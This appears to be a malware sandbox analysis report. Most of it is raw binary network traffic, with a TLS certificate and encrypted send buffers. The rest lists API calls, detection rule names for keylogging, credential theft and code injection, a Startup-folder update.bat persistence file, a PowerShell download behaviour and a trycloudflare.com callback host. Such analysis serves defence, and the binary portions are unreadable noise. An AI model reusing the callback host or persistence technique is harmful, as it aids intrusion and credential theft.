é3¼R™¯2µ)³%*´HùráÊd÷悍èÂŠˆú8fŠücùùxý{\wúv‡úìß±y•W´½&ïÖÑë »Ž µÅŊU«Ó¬ê‘K)̤2%N*ñeDÐΪÎI´êŸ|ƒ°@{çC«§l£}‰úL¥ÿՎÃÎKàµØ³ŽEÏvÀí@+ýS°§Õ; ±Š¢Þ1­Ìwêo{>Öߑ"æ¾úØ2ücQrÞ]Ö“½)h3ï:fìŠ&ß×Wex'Þ^I¢š¨!¶©±•°¥¹ ÚÇlH<@à~ ZÍV<ї¹ËKí9KœÄ?ÒUn$°ÖqúôÁºÌíõþAؘ=:È®z˜7•£‚80‚40Uÿ†0Uÿ0ÿ0Uä¯+&q+H'…/Rf,ïð‰q>0U#0€`{fE —ʉP/}Í4¨ÿüýK0`+T0R0%+0†http://ocsp.pki.goog/gsr10)+0†http://pki.goog/gsr1/gsr1.crt02U+0)0' % #†!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g 0g 0  +Öy0  +Öy0  *†H†÷  ‚4¤±(£Ð´v¦1z!éÑR>ÈÛtAˆ¸=5íäÿ“á\_«»ê|ÏÛä ыWò&o[¾Fh”7okzÈÀ7ú%Q¬ìh¿²ÈIýZšÊ#¬„€+Œ™—ëIjŒu×Ç޲ɗŸXHW5¡äÖýoƒoïŒÏ—¯À…*ðõNi ‘-áh¸Á+séÔÙü"À7 fIíUgá2×Ó&¿pã=ôgm=|å4ˆã2ú§njo½‹‘îKè;©³7çÃD¤~Øl×ÇFõ’›çÕ!¾f’”UlÔ)² Áf[âwIH(í×3rS³‚5Ïb‹É$‹¥·9 »~*A¿RÏü¢–¶Â‚?
Data received K
Data received GAŠ¿sºÞJÒ!7‹ p»Ó0ªÅ:°>Åg7>T۟º³>£õb0aÖ$uà%ÂQÚüýÖDZ%PÖ̂Š;ÆÚÕVpžšFó"Wrt¦ßÒßò¶Ko^×eŽŠd–˜útrj¶Xf²´Û,©íè1\˜ ëX9·F+?ã–ÔzX˜zŒr\~ …{9„×(BAÁu€ÈéC_^ÛC]ÐrÃÄ7Ë 1KZ-^ ¸Œ'y8ǖá~QB÷š]g`zцÌ/¬%ӌï;1R{¥Ù˜õù(îR/µá½~q#t¹^ í¡Úáj8üòiîä~î+ÙF :ŸQâä%£®+!ìõfy{¥õy6!á‰JvfÀß!egk¥O¯×Pfıà Z$Wߐz­ã‘ß.ÿ‰¨Q͙ÿ/ä¬\†©¥plôáNã‚
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ]=lI9æUtÁë$pðý~µõ\:‰ e¬wäa¸\(ï­@‘L†|ËÈ5,t:
Data received p
Data received ˆ3,}ËӒŒÓ=EÂàNôkŒÉ®ÏÍ8†κX…úM¹ï±>Ÿ ?éâU•¤øF%ñô[•‹:þåðÂÿCŒ”t¿Ý ÷Âi÷± î:Ø LÎú)¥aªÙøÄ~:‰±÷-úzªó¤/e¹î}0ÒÍ£Q ƒÌÉ "Ì®ƒt ááòô¦'öR‰“gÚj ¿Jþ¬›É<e¬òÿå÷‹Öô&RŸ'‹p‡5«êI_Ȃò9yÑm1¦þ…n>ú|¼ãØ<Ҁ]Šâq¶Ã¿XÅ?ˆó[$'@ü¤a·DÏ Èk =¾µ&0bfã:,Æ3ØQrˆà*ÝBì7!V²<«ïë<ø¹àÃÆÞ븋’òjðwTö› Äg/ù &ö$D 'rþËSfD^øWeTëíô8í ¦…½÷‹ÝN­¯ÿ>%ÏAy÷ñÌ@É%…Û<)×"¤bÀíb Ó´ÚÖ1˜¼leÏ]BÛ¤ƒ+S¹c9o:¨Tæa‰Üt‹é'ŒýlA‰~<Cžõèd¤WDŠÇ6d6 HÅÐÞg½TÝÈtn߯Y1¦›Iù3=†U#…z$…®úðä‹3¾ì^"èbÉÞè•ô´hN«u(€€ Dwô=+-†JîžL-²ÛßÑÿéÖ$— ¡Wn(‡Âæl ‰¢´˜ý?KÞ¥Ñt·Æºó¾dí¦’zŠxè¯Ã1¶ïåk1‚ÖÜ"¿¢´ÀÒàniŸhúRɱª½lڈLD“ÀÏÐrÊØÖs €ýå4ÇSÏ×˲ÖÕÎvíÕýÂýat£Ôhإ@u”­ÍeE¶HÄ*±­×䅖¶ñ\CJZós‚>ÚÄãg ¢§'h„ÊQ½rO3Õ7ß]žñ©º[u§zT,ÿµÈÖÁú×ö\ù )d€!¡qÃHq_ÚB AډS°Ô5‡t;¸H8îJn~l\ $o?©íܼ<ºæØØ«`ÁJ¿ ·S2=ˆI6³œÁlœfr·Wø@ÿ°¿Îý5GMLNqáZ‹öRj:¼Š¥&Î^%ÍBÌ$9h7È!ÌuՀõŠaà‘z2앹6ʪ)­Å è \¾Po;£üøCµ­”ØHú  ‡í°zzæ£o 6hË¡O"yCð:ÙQûŽC2ÅtRƌ©š,ؼ÷xC©‘X¿<T/:™B>Q¬$č›ÁtgÏuHÎI¾^nèL¶€ú5~ R8CKÓFB{\Hz™xÄvM÷bъ+) å!—½ì6fg0Ä¡-­Ð×.²Ú¢Ï@K¹G1ãQÓ¯#=OF›©HÕì™|åxæHëFY墣A\f¯³ò®ô:NæÀµ±NƤ8’9Må¿ï•N$=$¦ï>WI÷77 Q6ä}€Ö8ý Ozó9%7År²d¼<°o3gAüÓ7áúžsIC6«QFÊ0³à#H ]¬yÇ3U× Å[Ï•<ŀުB’6Ýj`Ø:&¥§œ5qY!yr'R8ÝQ‹9–¶È*ߟû¸ýv¨Hß6ñ¨…[‘b‚< Õ±ûl?àHûpá–U1£j쌨ü~m‡Ù#ØÂ-éÙ»É0ôhK)V˜þrÁO¶Gˆo·ïeB~£ý"_›ƒ<?*œ þs¶;)?‚b/¡‘¢~º¸‰¾!?;3/C—îŽ\KŠšátŠ„¿—ïëx`Ä:kCçЬ Téœ*œ'þöUã¦!d¤y˚³õå@àG1Ãöàùc”"»c¼®™~˜Ý÷:
Data received êgW益œ¶‡*cãQ³oüª×aŠT©i)_3=Ëہû ™ù¹tuûN‘CU:Å}¢gX}Ì\ñMôݏ>W×-?ñÎôö2Ü£BÁX”¶4²=Ãǽ+iµÆûܜtŸ"¹V°èÉ9c` mÀ Á˵ÄkH„w.¤]áÞà¯ÚÊêµà e›Æ¥æ"LÿòGÕ¡ŽÈûòÜuãɈ…[v øbxA –uò¨½{*¿7%RV©¬õ—\Ÿ ÅÝDÊ2՝-ÃÆ”D°xK.zaº40£å¿Íå̇qÂ~*²K4áhV+³Ô‰Þ‡¼§ÌS‚6_óRŒí &ہðÿ»­'%ãøÜ7÷jæZSäaí†!b×SÛ¼jf²fVjyN{/$ :/æpöþ7ž\ü§glƒ"ìÈÉÿé‹HЖply·#ÀH°«Ï¡‘˜!«HJd”¯0 (ͽëNΤaŠZRœ¢F¦1!P¿¹¾{PÞLã‘ׯ nzOk‡EÆÔ2epf¤©÷j ÈÉÀ~ÉþÎβĔÂ&É¿ƒZ áÐo,1íZÄËò¿ž¶.s47þ3¶´ƒ× >kœ^Ng»Z‹ðR¿ƒÂ†OhPñ©¿T¸-í90SÏj»E%-‚g»ªˆyLºQ˜ØÕ„¶‹ ®Ã&¹ºÐ1Ç!|‹é^ÑËtÕ^‹ A4™¥ÀÕl`‚=Í¡k_ã—OSžp”=IšÛ,=PöŽ¿`7£èæ`0àöM½ ¹wgcšS$mĸ`4`?ù½ãΚÕ5ÍòžôaגiâîVôfrSP{›AFóÒû&Øàwo³Á~ãśómc{Ÿyyò8±6¸æ:އ „Ï×w€_„.@EyJ¤ èoßDJ5Pvº²5‡ÎB™)Ÿö94q%t­¿º€‹vxH…çΪ£ÞM®H1ªb÷ùöòTîU&³ÝSڕõBÙØÈ E¨•û¹l°ÁߕÌÐ$ Û8²‚EÚ'’EF~Ï_uKk1ÄIå3bۑ¦p»X°Û¦}ÆuÊ!¸e’jåå´,Z@ü€­^ð‡ƒÁ€|Yi÷¨ó×2 õȔڏ;_ìÐ3E%Ƃ,îNn›®_KRuŸ2v¥k¾È& ¤Cngvçñ!ƒaj¸öˆai0Œ¯gb¼*V•+Mhó?7jãì(æÙ—,už { ¯xí][”§˜k¦=XUöWoíL5CûbfcuvC)Äà χ2¶<§0<0êË4¡_©‹SCÒø›õ>ŒPÚz»…{¯@U/^öÈ 4ö¾ÈÎ?£Z±ýàò~k 3‚W[d¥)x€—Í"§Oªšâ-í2?Š þ¦w£?ž4)Q:œÈO†]»)ÖÐàr-K «Ø»:>õ Ç,Œ"Lc.FZ€ìýéd¹ÂÃn?2ÝÆú P¶—š6?=Ê­2;÷S‘0M 9ôöRŸœ8Íњ`T°¸jòà†žòFM)8´à¤H÷LÝLu {pº0ða°óŸK@‹Ñ't¸ۘ—Ýp =uG²&í˜Ã¬Í½„·8[LBBŸø†-Û€¡0y{&rý†X }5×<¶3`u²+™Ü„Š£s+ºÒ_?ªF‰g ”2»ÿh"ðf#¹rªDØÂlÊ0VÛ:Re3Ìl*­‚¿’햍¥À§RœéÔI¸Ì¥&º]vMñ?#‹[éƒÉD<˜a‹8á.d´WKk[(rɗ—?tןø»‰ó!òÊ4X¯Ê~ø…Ãþf·‰ýáªQ¬ÄíÆ}>yk _E§fÃÏ´vªÒ–åvݞÌ
Data received S±kGQpْŸW&JÉ×ç·"æ ú¡ºïEø˜å< ò®)€µªQ1¡Ý·o¤ÃÀj1åf`8 ω‚ÎWöx-몗]¯aáCǽ÷$§ö°ôžÓ¿e»Œåj¿…`¬F r­]Œ`£’úΌꊮR*J=˜N²ƒ9͔.F‡5‚ÿJ3ä/$•:J¦'§Ü¡dl. ŸKÝZP'è›Sÿ̦ÇÊ;kЕ¼C”ñ$„’ÜYмÿ|®ls@l­¨¶Ù;³šþ&I>ž=Ès©™(õ!‘›¸`kVa3oÀA:j7‡GˆÒMÖDz7_.ãàðÔÏÐí|ýNã1 5%ۚÒkñµ¥xIH”$.N%Ï5e¢~!ÞÄ·¥tòzªÐ[…WCjÕQ¥h ùå"5sEìÿ@_Ùµ‡­÷‹žm½ÇJ/¸xMbtU¤Èo0Ñ£æu¥Ôšt¤TTÕg*&…PM'O<ú¨#s G…°±Ÿ©Ø<*ªº[SÅTêÍó>À?;ú›N¥ÖçeãCðiawÖv7Ԇù…Á½Mù<Àî¡û`š®]ä\׋ƘÁò{ÆÔŸÞ~Ùyú×ãû1<”54 ¢d‰[¨Füˆ[´þúîUǞXIvtu䙯}ö¥ÍC sè/ÂWì¼ÊT>Ðg³ ÙBßcʾnÁ{]²>áâa•ÐÎ)}ì›mS#ÒrAz–ñ³à#ÈB­ŽÉÜt¸ˆ%îîo_ws(ü©|Ð[~†PÁT½ ÿ¦&í¬¦ÂºŸ6AÉ{eÝQ·^ÎM°³5lœ.˜Ú²vNÕHµ]Šô;Ö573Âgê<}éÏÔE(#˜ô+êÀ.å5m´Øò‚Ýõÿ{õ¹:L#ƍ-oš‚I6aëËÀQ“n—žÍĽ)BÏÎs˜Û3ƒüx!ù·iKDm äo®skXs †Íf€¼ Ó§êYX2¾U‘[i¸R6ýÛ@'<%–7SyE)1aX RmûFü„üsëXÀ"¥ˆ´¾•„e·ŽÊä2ôü w¶`¤!s¥•Ì|`èX§)GAƒ\ÞJɦ‘¿–¯ëE<FM$ÒõЏ^®4†6ú_ð2A?V0Œò1ðÊP F[¡Ô‡÷È6õ^&‰SOàD'‹-nö^{do˜Î©nnÁ)Z韃Âîä»Öú¦ÙétŽ%?b¢¦ã$õ¥}µÝñ—P¢ÆÆ¢ƒŒ{p¾æ¹Ø¸ªõ§Ã’ mØ”°y°N+_ “Á>­•ƒ‰÷ ò$:Æ|Øóxh”ФhŽZ·ó\¼]2ùûŒ€/܋~²¦èöêç=‘Î’9AÂY(ªf²¢ÞzÿlüÙ:֡ꇕÜ(û…p] ‡<ðï!¬žÒ.Õ#¥9D|ðKGŠÄ2¦JˆLÝHÆoÕFªã8z#ôï:JBf±W†Ÿ7´Îí %CÖ(o?5, ¥ž±›c@Å2pÄݐÛ‚T祀ÉGa>ZVW:âù<ªýðš*ª6ωՂçïõr<íDèxß帑šÀÑX5>‚Ñ{†¿£?³«DNÂå^¿ÝÝ<æÒßE:š`}ì-¯Ê¤1zá0Êz¡ !Ǘ”³©ß?âu{ÿºÄxK…!ß {…m¼Üby|3_;IÕÀ«qïKõHöD›ǒ…’kÊ%~ÈO¥$o@çá’uƜXåÇR³³ŠÞå¢[á…lÞÆÖ@V«·ÿ֏=Õ%|ÎTYPG»!ýô¡]¹G}¸F;¹—\éf¿804Ü
Data received ð
Data received {Ï¡—5n› É9Sãz–«÷âHÁ'80¶H®UÚ¦ª¢|¨5v¿ø˜-¿l]À™!)’ãVmŽBȓg§Lk ØðjTŠZÀI•oÙp_Ò7ÝD‘v`Üd†0|ºÇ¿¨Lº¶ à—­‚ÅÑ´úåhLïaQåœá¹æpœ¸~ӛ'i_Ä^m€“›OzKL—ÛW&ßo¹ë¼|ÄþHۜü¸?gëÿ âð Pñ.l.òR>ô¶^uÅ2/ò[G>§NýëEQíðakNñ-ÍT¸»šuÅiÏç]ˆ¾X"¬~DÄë>ØÔƒÿau—k:Äô§؂ÞåÝR,ЉÚä6Á d„Ä|On隠¾n¹¥BzjXÖ˜VÆhL Ó¬ d΀さ6T¥‚0Š“º© ÷1ǑbÂ_r¼„BºƒÀPi奯àµm£¸Â#yNôy:‰™/×<$.kw5²s7EO5þº€Úù8]²¦i Öiü«¹–ðöÅEØE/fÑ"FÅ×ÈPö¦ñYؔ©áÈi"„*Â4ßçÎáoÌéjõîقÂñݶ¸ 645(’${>=S\¦ûóÁ ‰ŸÃëΚͯÊ_œÉ­¾[…){Ç+v!5ù
Data sent ”hâÔ'k--îR2ìaû‡Õd¼-¬’kRñ«[¡€ì/5 ÀÀÀ À 28Oÿ641minutes-amazing-curriculum-maui.trycloudflare.com  
Data sent FBAƒä’o_ªÓi^‹ïraÜ!`$§Á Y´¤^©ÑÇîÆÃIaF(ÉF@‚ˆ1ú¿vqrz +ÌÞò²u!0˜ ÜžÌ -÷ÆÍ¾ºÀOş`Ä}³Ú{™.¡,ÂxùPç’âÑ6Š÷ SÖ}ÆQ
Data sent  Œ“*1dm[¤Ú+J‡“@Ù3EC7Ÿ§ÙvmóÊäóþ]4U¾ã2L--wLÒ[ÙU7VÿGS†Ò BU}g÷gƒæzµC$5QÑ÷µ ó“Ôý/ƒ/¸”YÆ?—¼R40ÿ"êKi§•ø·–㳓Âò-ÒK•Þ"\@鋿o͸¼žM€e'A"\o£
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat
Time & API Arguments Status Return Repeated

send

buffer: ”hâÔ'k--îR2ìaû‡Õd¼-¬’kRñ«[¡€ì/5 ÀÀÀ À 28Oÿ641minutes-amazing-curriculum-maui.trycloudflare.com  
socket: 1420
sent: 153
1 153 0

send

buffer: FBAƒä’o_ªÓi^‹ïraÜ!`$§Á Y´¤^©ÑÇîÆÃIaF(ÉF@‚ˆ1ú¿vqrz +ÌÞò²u!0˜ ÜžÌ -÷ÆÍ¾ºÀOş`Ä}³Ú{™.¡,ÂxùPç’âÑ6Š÷ SÖ}ÆQ
socket: 1420
sent: 134
1 134 0

send

buffer:  Œ“*1dm[¤Ú+J‡“@Ù3EC7Ÿ§ÙvmóÊäóþ]4U¾ã2L--wLÒ[ÙU7VÿGS†Ò BU}g÷gƒæzµC$5QÑ÷µ ó“Ôý/ƒ/¸”YÆ?—¼R40ÿ"êKi§•ø·–㳓Âò-ÒK•Þ"\@鋿o͸¼žM€e'A"\o£
socket: 1420
sent: 149
1 149 0
file 1ac0249a4c6ed5f3_update.bat
value Uses powershell to execute a file download from the command line
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe